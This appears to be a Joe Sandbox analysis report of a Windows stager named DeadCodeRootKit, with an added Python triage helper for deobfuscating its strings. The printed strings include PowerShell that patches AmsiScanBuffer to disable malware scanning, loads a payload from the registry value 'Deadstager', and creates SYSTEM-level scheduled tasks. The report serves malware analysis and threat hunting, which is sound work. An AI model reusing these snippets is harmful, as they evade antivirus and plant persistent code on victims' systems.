                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv), ref: 00B018CC
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,00B02230), ref: 00B018D0
                                                          • Part of subcall function 00B01672: SysAllocString.OLEAUT32(Deadsvc32), ref: 00B01684
                                                          • Part of subcall function 00B01672: SysAllocString.OLEAUT32(00B0218C), ref: 00B0168E
                                                          • Part of subcall function 00B01672: CoInitializeEx.COMBASE(00000000,00000000), ref: 00B01697
                                                          • Part of subcall function 00B01672: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B016B1
                                                          • Part of subcall function 00B01672: CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B016DC
                                                          • Part of subcall function 00B01672: VariantInit.OLEAUT32(?), ref: 00B016EE
                                                          • Part of subcall function 00B01672: CoUninitialize.COMBASE ref: 00B0177B
                                                          • Part of subcall function 00B01672: SysFreeString.OLEAUT32(?), ref: 00B0178D
                                                          • Part of subcall function 00B01672: SysFreeString.OLEAUT32(00000000), ref: 00B01790
                                                          • Part of subcall function 00B0112D: GetCurrentProcess.KERNEL32(?,00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B0113B
                                                          • Part of subcall function 00B0112D: IsWow64Process.KERNEL32(00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B01142
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(Deadsvc64), ref: 00B011C0
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(00B0222C), ref: 00B011CA
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(powershell), ref: 00B011D6
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(?), ref: 00B011DE
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(00B0218C), ref: 00B011E8
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(SYSTEM), ref: 00B011F2
                                                          • Part of subcall function 00B011AB: CoInitializeEx.COMBASE(00000000,00000000), ref: 00B011F9
                                                          • Part of subcall function 00B011AB: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01213
                                                          • Part of subcall function 00B011AB: CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B0123C
                                                          • Part of subcall function 00B011AB: VariantInit.OLEAUT32(?), ref: 00B0124E
                                                          • Part of subcall function 00B01518: SysAllocString.OLEAUT32(Deadsvc64), ref: 00B0152A
                                                          • Part of subcall function 00B01518: SysAllocString.OLEAUT32(00B0218C), ref: 00B01536
                                                          • Part of subcall function 00B01518: CoInitializeEx.OLE32(00000000,00000000), ref: 00B0153D
                                                          • Part of subcall function 00B01518: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01557
                                                          • Part of subcall function 00B01518: CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B01580
                                                          • Part of subcall function 00B01518: VariantInit.OLEAUT32(?), ref: 00B01592
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
• Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                        • String ID: Deadstager$Deadsvc32$Deadsvc64$EXE$SOFTWARE
                                                        • API String ID: 2402434814-3166964389
                                                        • Opcode ID: 42b7a81cef5b3601d0ca8e9e6507b6e40d5cd92b0477f464f805bc1186e3b8e9
                                                        • Instruction ID: b992e5bb7bc6b6ec05ed5b8e45cdfe4d4bb6aa207cf97383213c4968b53b6420
                                                        • Opcode Fuzzy Hash: 42b7a81cef5b3601d0ca8e9e6507b6e40d5cd92b0477f464f805bc1186e3b8e9
                                                        • Instruction Fuzzy Hash: 8A1173717003146EE719277A9C9DE3B3DDEDB95B94B0448E9B906E71D1EE20CE0881B0
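The two API listings above describe how the native stager (process 3) builds its PowerShell loader: the routine at 00B01869 concatenates a script that copies the bytes 0xb8,0x57,0,7,0x80,0xc2,0x18,0 over AmsiScanBuffer and then loads the .NET payload from the HKLM\SOFTWARE value "Deadstager" via [Reflection.Assembly]::Load, while the routine at 00B019E2 pulls random bytes through CryptGenRandom and rewrites the script with '+[Char](N)+' fragments so that no keyword survives as a contiguous string. The following is an added triage helper, not code from the report or from the sample: it folds the '+[Char](N)+' concatenation back together, decodes any [Byte[]] literal as the mov eax,imm32 / ret stub that makes AmsiScanBuffer return E_INVALIDARG (0x80070057; the ret 0x18 form is the 32-bit stdcall variant that pops the six arguments), and pulls out the registry hive, subkey and value name the loader reads. The sample script at the bottom is constructed to mimic the fragments listed in the report; the trailing Invoke($null,$null) is an assumption, since the report truncates the string at EntryPoint.Inv.

```python
import re
import struct

# Tokens in the builder's output: a single-quoted PowerShell literal (with ''
# as an escaped quote) or a [Char](N) call; the '+' joins are simply skipped.
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[Char\]\((\d+)\)", re.IGNORECASE)
# [Byte[]](0xb8,0x57,...) literal as written in the report's strings.
_BYTE_ARRAY = re.compile(r"\[Byte\[\]\]\(\s*([^)]*)\)", re.IGNORECASE)
# Assembly.Load(<Registry hive>.OpenSubkey(key).GetValue(name)); quote
# characters around key and name are optional so backticks and quotes both work.
_REG_LOADER = re.compile(
    r"\[Reflection\.Assembly\]::Load\(\[Microsoft\.Win32\.Registry\]::(\w+)"
    r"\.OpenSubkey\(\W?([\w\\]+)\W?\)\.GetValue\(\W?(\w+)\W?\)",
    re.IGNORECASE,
)


def unsplit_char_concat(expr: str) -> str:
    """Fold a '...'+[Char](N)+'...' concatenation back into one string."""
    parts = []
    for literal, code in _TOKEN.findall(expr):
        parts.append(chr(int(code)) if code else literal.replace("''", "'"))
    return "".join(parts)


def extract_byte_arrays(script: str) -> list:
    """Return every [Byte[]](...) literal in the script as a bytes object."""
    arrays = []
    for m in _BYTE_ARRAY.finditer(script):
        values = [int(v.strip(), 0) for v in m.group(1).split(",") if v.strip()]
        arrays.append(bytes(values))
    return arrays


def describe_patch(blob: bytes):
    """Recognise a 'mov eax, imm32 ; ret [imm16]' stub (what gets written over AmsiScanBuffer)."""
    if len(blob) < 6 or blob[0] != 0xB8:          # b8 imm32 = mov eax, imm32
        return None
    hresult = struct.unpack_from("<I", blob, 1)[0]
    tail = blob[5:]
    if tail[:1] == b"\xc3":                       # c3 = ret (64-bit form)
        return f"mov eax,0x{hresult:08x}; ret"
    if tail[:1] == b"\xc2" and len(tail) >= 3:    # c2 imm16 = ret imm16 (32-bit stdcall form)
        popped = struct.unpack_from("<H", tail, 1)[0]
        return f"mov eax,0x{hresult:08x}; ret 0x{popped:x}"
    return None


def triage(obfuscated: str) -> dict:
    """Deobfuscate one builder string and report the AMSI patch and registry loader it carries."""
    script = unsplit_char_concat(obfuscated)
    findings = {"script": script, "amsi_patch": None, "registry_loader": None}
    if "AmsiScanBuffer" in script:
        for blob in extract_byte_arrays(script):
            desc = describe_patch(blob)
            if desc:
                findings["amsi_patch"] = desc
                break
    m = _REG_LOADER.search(script)
    if m:
        findings["registry_loader"] = (m.group(1), m.group(2), m.group(3))
    return findings


# Constructed input modelled on the fragments in the report (not captured data).
SAMPLE = (
    "'[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$Ams'"
    "+[Char](105)+'ScanBufferPtr,8);'"
    "+'[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetVa'"
    "+[Char](108)+'ue(`Deadstager`)).EntryPoint.Invoke($null,$null)'"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The registry tuple it returns (hive, subkey, value name) is the hunt input: on a suspect host, the presence of that REG_BINARY value, together with the Deadsvc32/Deadsvc64 scheduled tasks the COM routines at 00B01672, 00B011AB and 00B01518 register with a powershell action running as SYSTEM, confirms the chain this report describes.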

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 172 b01672-b0169f SysAllocString * 2 CoInitializeEx 173 b01783 172->173 174 b016a5-b016b9 CoInitializeSecurity 172->174 177 b01786-b01798 SysFreeString * 2 173->177 175 b016c6-b016e4 CoCreateInstance 174->175 176 b016bb-b016c0 174->176 178 b01778 175->178 179 b016ea-b01729 VariantInit 175->179 176->175 176->178 180 b0177b-b01781 CoUninitialize 178->180 181 b0172d-b01732 179->181 180->177 182 b01734-b0174a 181->182 183 b0176a 181->183 184 b0176d-b01776 182->184 187 b0174c-b01768 182->187 183->184 184->180 187->184
                                                        APIs
                                                        • SysAllocString.OLEAUT32(Deadsvc32), ref: 00B01684
                                                        • SysAllocString.OLEAUT32(00B0218C), ref: 00B0168E
                                                        • CoInitializeEx.COMBASE(00000000,00000000), ref: 00B01697
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B016B1
                                                        • CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B016DC
                                                        • VariantInit.OLEAUT32(?), ref: 00B016EE
                                                        • CoUninitialize.COMBASE ref: 00B0177B
                                                        • SysFreeString.OLEAUT32(?), ref: 00B0178D
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B01790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: Deadsvc32
                                                        • API String ID: 4184240511-3318990577
                                                        • Opcode ID: 6472a1fd3a17b3052e3fcf758df704ebea1d3c3ba32354f369288e9bdcb3e413
                                                        • Instruction ID: a397a0fde7034f7d47ecde5170f9faa44d524cf5bdf96cae5f2a67e1759d7108
                                                        • Opcode Fuzzy Hash: 6472a1fd3a17b3052e3fcf758df704ebea1d3c3ba32354f369288e9bdcb3e413
                                                        • Instruction Fuzzy Hash: EC417271E00218AFDB05DFA8DC889AF7BBDEF49754B104498F905EB150DA71AD05CBA0

                                                        Control-flow Graph

                                                        control_flow_graph 190 b01000-b01028 CryptAcquireContextW 191 b01048-b0104e 190->191 192 b0102a-b01042 CryptGenRandom CryptReleaseContext 190->192 192->191
                                                        APIs
                                                        • CryptAcquireContextW.ADVAPI32(00B01A30,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00B01A30), ref: 00B01020
                                                        • CryptGenRandom.ADVAPI32(00B01A30,00004000,00000000,?,00B01A30), ref: 00B0102F
                                                        • CryptReleaseContext.ADVAPI32(00B01A30,00000000,?,00B01A30), ref: 00B01042
                                                        Strings
                                                        • Microsoft Base Cryptographic Provider v1.0, xrefs: 00B01014
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID: Microsoft Base Cryptographic Provider v1.0
                                                        • API String ID: 1815803762-291530887
                                                        • Opcode ID: 1b291db2f314329a3eb20d4a341a93e42dc0cbec357c079b7e33c3a1ed2a69b3
                                                        • Instruction ID: 8b3596a5eda456252a4fdc9414b55a39ec001b2052322915728c092b40fdd4e4
                                                        • Opcode Fuzzy Hash: 1b291db2f314329a3eb20d4a341a93e42dc0cbec357c079b7e33c3a1ed2a69b3
                                                        • Instruction Fuzzy Hash: 6FF06572700314BFFB2487E59D4DFAB7AEDDB95791F104465BA01E3190FAA0DD04D660

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00B01828,?,?,?,?,?,00B0179E), ref: 00B01873
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B0187A
                                                        • StrCpyW.SHLWAPI(00000000,00B02230), ref: 00B01889
                                                        • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 00B018A4
                                                          • Part of subcall function 00B0112D: GetCurrentProcess.KERNEL32(?,00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B0113B
                                                          • Part of subcall function 00B0112D: IsWow64Process.KERNEL32(00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B01142
                                                        • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 00B018BC
                                                        • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 00B018C4
                                                        • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv), ref: 00B018CC
                                                        • StrCatW.SHLWAPI(00000000,00B02230), ref: 00B018D0
                                                        Strings
                                                        • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 00B018B6
                                                        • VirtualProtectPtr, xrefs: 00B01951
                                                        • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv, xrefs: 00B018C6
                                                        • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 00B0189E
                                                        • NativeMethods, xrefs: 00B01909
                                                        • AmsiScanBufferPtr, xrefs: 00B01969
                                                        • LoadLibraryPtr, xrefs: 00B01945
                                                        • TypeBuilder, xrefs: 00B018FD
                                                        • OldProtect, xrefs: 00B01975
                                                        • VirtualProtectDelegate, xrefs: 00B0192D
                                                        • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 00B018AF
                                                        • Get-Delegate, xrefs: 00B018D9
                                                        • ParameterTypes, xrefs: 00B018E5
                                                        • ReturnType, xrefs: 00B018F1
                                                        • LoadLibraryDelegate, xrefs: 00B01921
                                                        • AmsiPtr, xrefs: 00B0195D
                                                        • Kernel32Ptr, xrefs: 00B01939
                                                        • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 00B018BE
                                                        • GetProcAddress, xrefs: 00B01915
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$AllocCurrentWow64
                                                        • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                        • API String ID: 2666690646-2533166174
                                                        • Opcode ID: c895c845931ec100b1f463e3fa26534c881cacbe28fb9c0dac66ba17f1725679
                                                        • Instruction ID: 130fce0b09ed9e338bd0ed571a6f6d359f86269d33f5b814bffa55fcd8e1cab3
                                                        • Opcode Fuzzy Hash: c895c845931ec100b1f463e3fa26534c881cacbe28fb9c0dac66ba17f1725679
                                                        • Instruction Fuzzy Hash: 5B21CFD13015A427DE0E33A9086ED2EADDE8BE2F4472084E4F0415BBD5CE1A8F0783DA

                                                        Control-flow Graph

                                                        control_flow_graph 61 b011ab-b01201 SysAllocString * 6 CoInitializeEx 62 b01207-b0121b CoInitializeSecurity 61->62 63 b014ee 61->63 64 b01228-b01244 CoCreateInstance 62->64 65 b0121d-b01222 62->65 66 b014f1-b01517 SysFreeString * 6 63->66 67 b014e3 64->67 68 b0124a-b0128f VariantInit 64->68 65->64 65->67 69 b014e6-b014ec CoUninitialize 67->69 71 b014d2 68->71 72 b01295-b012aa 68->72 69->66 73 b014d5-b014e1 71->73 72->71 76 b012b0-b012c3 72->76 73->69 78 b014c4 76->78 79 b012c9-b012db 76->79 80 b014c7-b014d0 78->80 82 b012e1-b012ee 79->82 83 b014b6 79->83 80->73 87 b012f4-b01300 82->87 88 b014a8 82->88 85 b014b9-b014c2 83->85 85->80 87->88 93 b01306-b01318 87->93 90 b014ab-b014b4 88->90 90->85 93->88 95 b0131e-b01334 93->95 97 b0149a 95->97 98 b0133a-b01350 95->98 99 b0149d-b014a6 97->99 102 b01356-b01368 98->102 103 b0148c 98->103 99->90 106 b0147e 102->106 107 b0136e-b01381 102->107 104 b0148f-b01498 103->104 104->99 109 b01481-b0148a 106->109 111 b01470 107->111 112 b01387-b0139d 107->112 109->104 114 b01473-b0147c 111->114 117 b01462 112->117 118 b013a3-b013b1 112->118 114->109 119 b01465-b0146e 117->119 122 b01454 118->122 123 b013b7-b013c5 118->123 119->114 124 b01457-b01460 122->124 123->122 126 b013cb-b013d9 123->126 124->119 126->122 129 b013db-b0143e VariantInit * 3 126->129 130 b01442-b01444 129->130 130->124 131 b01446-b01452 130->131 131->124
                                                        APIs
                                                        • SysAllocString.OLEAUT32(Deadsvc64), ref: 00B011C0
                                                        • SysAllocString.OLEAUT32(00B0222C), ref: 00B011CA
                                                        • SysAllocString.OLEAUT32(powershell), ref: 00B011D6
                                                        • SysAllocString.OLEAUT32(?), ref: 00B011DE
                                                        • SysAllocString.OLEAUT32(00B0218C), ref: 00B011E8
                                                        • SysAllocString.OLEAUT32(SYSTEM), ref: 00B011F2
                                                        • CoInitializeEx.COMBASE(00000000,00000000), ref: 00B011F9
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01213
                                                        • CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B0123C
                                                        • VariantInit.OLEAUT32(?), ref: 00B0124E
                                                        • VariantInit.OLEAUT32(?), ref: 00B013E8
                                                        • VariantInit.OLEAUT32(?), ref: 00B013EE
                                                        • VariantInit.OLEAUT32(?), ref: 00B013FE
                                                        • CoUninitialize.COMBASE ref: 00B014E6
                                                        • SysFreeString.OLEAUT32(?), ref: 00B014F8
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B014FB
                                                        • SysFreeString.OLEAUT32(?), ref: 00B01500
                                                        • SysFreeString.OLEAUT32(?), ref: 00B01505
                                                        • SysFreeString.OLEAUT32(?), ref: 00B0150A
                                                        • SysFreeString.OLEAUT32(?), ref: 00B0150F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                        • String ID: Deadsvc32$Deadsvc64$SYSTEM$powershell
                                                        • API String ID: 3960698109-685761376
                                                        • Opcode ID: 775a7dcd5d66b487f7f8beb1649821786b7f6339b113fb56d6989f3783495802
                                                        • Instruction ID: 085dc1c71908af6d973c207d6aebb9f3bb431697aee6c1e2ccc123605ff04952
                                                        • Opcode Fuzzy Hash: 775a7dcd5d66b487f7f8beb1649821786b7f6339b113fb56d6989f3783495802
                                                        • Instruction Fuzzy Hash: 4AC1F771E00119AFDF04DFA9D9889AEBBF9FF49354B104498E905EB260DB71AE05CF60

                                                        Control-flow Graph

                                                        control_flow_graph 133 b01518-b01545 SysAllocString * 2 CoInitializeEx 134 b0154b-b0155f CoInitializeSecurity 133->134 135 b0165d-b01671 SysFreeString * 2 133->135 136 b01561-b01566 134->136 137 b0156c-b01588 CoCreateInstance 134->137 136->137 138 b01657 CoUninitialize 136->138 137->138 139 b0158e-b015d3 VariantInit 137->139 138->135 141 b015d5-b015ea 139->141 142 b0164b-b01654 139->142 141->142 145 b015ec-b01601 141->145 142->138 147 b01642-b01646 145->147 148 b01603-b0162b VariantInit 145->148 147->142 150 b01639-b0163d 148->150 151 b0162d-b01634 148->151 150->147 151->150
                                                        APIs
                                                        • SysAllocString.OLEAUT32(Deadsvc64), ref: 00B0152A
                                                        • SysAllocString.OLEAUT32(00B0218C), ref: 00B01536
                                                        • CoInitializeEx.OLE32(00000000,00000000), ref: 00B0153D
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01557
                                                        • CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B01580
                                                        • VariantInit.OLEAUT32(?), ref: 00B01592
                                                        • VariantInit.OLEAUT32(?), ref: 00B01607
                                                        • CoUninitialize.COMBASE ref: 00B01657
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B01664
                                                        • SysFreeString.OLEAUT32(?), ref: 00B01669
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                        • String ID: Deadsvc32$Deadsvc64
                                                        • API String ID: 2407135876-806753349
                                                        • Opcode ID: 543a6ec4b3c6ae8dc14678402670cab475f8d471908d34dc8c4b2dbfff3e56ac
                                                        • Instruction ID: 9287d4316719b38f190d61e743da470350d43a9e458092ce5e47c21ac0860195
                                                        • Opcode Fuzzy Hash: 543a6ec4b3c6ae8dc14678402670cab475f8d471908d34dc8c4b2dbfff3e56ac
                                                        • Instruction Fuzzy Hash: 89413171E00219AFDB01DFA8DC889AFBBBDEF49314B144498F905EB250DA71AD45CBA0

                                                        Control-flow Graph

                                                        control_flow_graph 193 b01987-b019b2 lstrlenW call b0104f 196 b019b4-b019be StrStrIW 193->196 197 b019de-b019e1 193->197 196->197 198 b019c0 196->198 199 b019c1-b019db StrStrIW 198->199 199->199 200 b019dd 199->200 200->197
                                                        APIs
                                                        • lstrlenW.KERNEL32(Get-Delegate,00000000,00B02230), ref: 00B0199A
                                                        • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 00B019B6
                                                        • StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 00B019D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: Get-Delegate
                                                        • API String ID: 1659193697-1365458365
                                                        • Opcode ID: fcad9cf41d18166cd7fe7b656fd62e3ad064be85e67adbf2caad615e74319b52
                                                        • Instruction ID: 3d6765d67db00a63c56ce458f6de2550116e1a9bcad23fc1dd317e58cfb8dbfa
                                                        • Opcode Fuzzy Hash: fcad9cf41d18166cd7fe7b656fd62e3ad064be85e67adbf2caad615e74319b52
                                                        • Instruction Fuzzy Hash: 3DF05471B00219ABDB249BA99D487AEBBFDEF44384F0000A6E509F3150FE709E06C6A0

                                                        Control-flow Graph

                                                        control_flow_graph 209 b01799-b0179f call b017a6 ExitProcess
                                                        APIs
                                                          • Part of subcall function 00B017A6: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 00B017B6
                                                          • Part of subcall function 00B017A6: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017C9
                                                          • Part of subcall function 00B017A6: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017DB
                                                          • Part of subcall function 00B017A6: LockResource.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B017E6
                                                          • Part of subcall function 00B017A6: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,00B0179E), ref: 00B01802
                                                          • Part of subcall function 00B017A6: RegSetValueExW.KERNELBASE(?,Deadstager,00000000,00000003,00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B01819
                                                        • ExitProcess.KERNEL32 ref: 00B0179F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                        • String ID:
                                                        • API String ID: 3836967525-0
                                                        • Opcode ID: 2c155d8ae0ddda3e82cbe6d2ee6283a665921b915cd2446f52ea811bc906a3a1
                                                        • Instruction ID: 09ff60b56266a7afc6ea845f5dc7bac3953be539f21b674973b811773efe385f
                                                        • Opcode Fuzzy Hash: 2c155d8ae0ddda3e82cbe6d2ee6283a665921b915cd2446f52ea811bc906a3a1
                                                        • Instruction Fuzzy Hash:

                                                        Control-flow Graph

                                                        control_flow_graph 212 b0118c-b01199 GetModuleHandleA 213 b011a8-b011aa 212->213 214 b0119b-b011a7 GetProcAddress 212->214
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,00B01176,?), ref: 00B01191
                                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00B011A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
